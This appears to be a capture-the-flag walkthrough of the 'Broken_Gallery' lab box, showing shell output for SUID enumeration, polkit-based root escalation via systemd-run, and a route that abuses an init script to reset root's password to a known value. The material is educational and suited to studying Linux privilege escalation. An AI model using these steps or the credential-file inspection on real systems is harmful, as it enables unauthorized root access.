uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# whoami
root
root@ubuntu:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:3b:1c:1c brd ff:ff:ff:ff:ff:ff
inet 192.1.1.141/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 1233sec preferred_lft 1233sec
inet6 fe80::46:b9bd:c17c:f599/64 scope link
valid_lft forever preferred_lft forever
root@ubuntu:~# uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

Linux Polkit Helper Privilege Escalation

broken@ubuntu:/etc$ find / -type f -perm -04000 -ls 2>/dev/null
1398 56 -rwsr-xr-x 1 root root 54256 Mar 29 2016 /usr/bin/passwd
1883 136 -rwsr-xr-x 1 root root 136808 Mar 30 2016 /usr/bin/sudo
1507 24 -rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
936 76 -rwsr-xr-x 1 root root 75304 Mar 29 2016 /usr/bin/gpasswd
616 40 -rwsr-xr-x 1 root root 40432 Mar 29 2016 /usr/bin/chsh
1335 40 -rwsr-xr-x 1 root root 39904 Mar 29 2016 /usr/bin/newgrp
614 52 -rwsr-xr-x 1 root root 49584 Mar 29 2016 /usr/bin/chfn
1962 24 -rwsr-xr-x 1 root root 23304 Apr 15 2016 /usr/bin/ubuntu-core-launcher
14572 384 -rwsr-xr-- 1 root dip 390888 Jan 29 2016 /usr/sbin/pppd
429498 12 -r-sr-xr-x 1 root root 9532 Aug 9 2019 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
577108 16 -r-sr-xr-x 1 root root 14320 Aug 9 2019 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
5149 12 -rwsr-xr-x 1 root root 10240 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
9869 16 -rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1
4851 44 -rwsr-xr-- 1 root messagebus 42992 Apr 1 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
135504 20 -rwsr-xr-x 1 root root 18664 Mar 10 2016 /usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
740 420 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /usr/lib/openssh/ssh-keysign
393321 140 -rwsr-xr-x 1 root root 142032 Feb 17 2016 /bin/ntfs-3g
393346 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
393393 28 -rwsr-xr-x 1 root root 27608 Apr 13 2016 /bin/umount
393309 40 -rwsr-xr-x 1 root root 40152 Apr 13 2016 /bin/mount
393373 40 -rwsr-xr-x 1 root root 40128 Mar 29 2016 /bin/su
393272 32 -rwsr-xr-x 1 root root 30800 Mar 11 2016 /bin/fusermount
393347 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6

Try escalating through the polkit helper: broken is in the sudo group, so polkit accepts broken's own password as administrator authentication for systemd-run.

broken@ubuntu:/etc$ systemd-run -t bash
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
Authentication is required to manage system services or other units.
Authenticating as: Broken,,, (broken)
Password:
==== AUTHENTICATION COMPLETE ===
Running as unit run-u42.service.
Press ^] three times within 1s to disconnect TTY.
root@ubuntu:/# whoami
root

Addendum

Sensitive files such as .bash_history and .viminfo must be inspected here. Whether or not they turn out to contain anything sensitive, they have to be checked; do not lower your own standards.

broken@ubuntu:~$ ls -liah
total 124K
152057 drwxr-xr-x 17 broken broken 4.0K Aug 9 2019 .
131074 drwxr-xr-x 3 root root 4.0K Aug 9 2019 ..
152710 -rw------- 1 broken broken 3.6K Jan 1 2018 .bash_history
152060 -rw-r--r-- 1 broken broken 220 Aug 9 2019 .bash_logout
152058 -rw-r--r-- 1 broken broken 3.7K Aug 9 2019 .bashrc
262259 drwx------ 14 broken broken 4.0K Aug 9 2019 .cache
281447 drwx------ 17 broken broken 4.0K Aug 9 2019 .config
290964 drwx------ 3 root root 4.0K Aug 9 2019 .dbus
281429 drwxr-xr-x 2 broken broken 4.0K Aug 9 2019 Desktop
133504 -rw-r--r-- 1 broken broken 25 Aug 9 2019 .dmrc
281443 drwxr-xr-x 2 broken broken 4.0K Aug 9 2019 Documents
281430 drwxr-xr-x 2 broken broken 4.0K Aug 9 2019 Downloads
152059 -rw-r--r-- 1 broken broken 8.8K Aug 9 2019 examples.desktop
283212 drwx------ 2 broken broken 4.0K Aug 9 2019 .gconf
282694 drwx------ 3 broken broken 4.0K Aug 9 2019 .gnupg
133509 -rw------- 1 broken broken 636 Aug 9 2019 .ICEauthority
281655 drwx------ 3 broken broken 4.0K Aug 9 2019 .local
152663 drwx------ 4 broken broken 4.0K Aug 9 2019 .mozilla
281444 drwxr-xr-x 2 broken broken 4.0K Aug 9 2019 Music
281445 drwxr-xr-x 2 broken broken 4.0K Aug 9 2019 Pictures
152061 -rw-r--r-- 1 broken broken 675 Aug 9 2019 .profile
281441 drwxr-xr-x 2 broken broken 4.0K Aug 9 2019 Public
133508 -rw-r--r-- 1 broken broken 0 Aug 9 2019 .sudo_as_admin_successful
281440 drwxr-xr-x 2 broken broken 4.0K Aug 9 2019 Templates
281446 drwxr-xr-x 2 broken broken 4.0K Aug 9 2019 Videos
152728 -rw------- 1 broken broken 5.3K Aug 8 2019 .viminfo
133506 -rw------- 1 broken broken 51 Aug 9 2019 .Xauthority
152745 -rw------- 1 broken broken 1.3K Aug 9 2019 .xsession-errors
133507 -rw------- 1 broken broken 1.3K Aug 8 2019 .xsession-errors.old

In fact, setting GTFOBins aside, the privilege escalation path the box was designed around is not the timedatectl shell. Both .viminfo and .bash_history reference an unusual file, ./password-policy.sh. Look at its contents:

broken@ubuntu:~$ cat /etc/init.d/password-policy.sh
#!/bin/bash

DAYOFWEEK=$(date +"%u")
echo DAYOFWEEK: $DAYOFWEEK

if [ "$DAYOFWEEK" -eq 4 ]
then
sudo sh -c 'echo root:TodayIsAgoodDay | chpasswd'
fi



#if [ "$DAYOFWEEK" == 4 ]

The script checks the day of the week (date +%u, where 4 is Thursday) and, on Thursdays, sets root's password to TodayIsAgoodDay.

So the intended route is: use sudo timedatectl set-time '2023-06-29' (a Thursday) to change the system time, sudo reboot to restart so the init script runs, then SSH back in as broken and use su with the password above to switch to root.


Broken_Gallery Box
https://i3eg1nner.github.io/2023/06/909fcb140cd3.html
Author: I3eg1nner
Published: June 26, 2023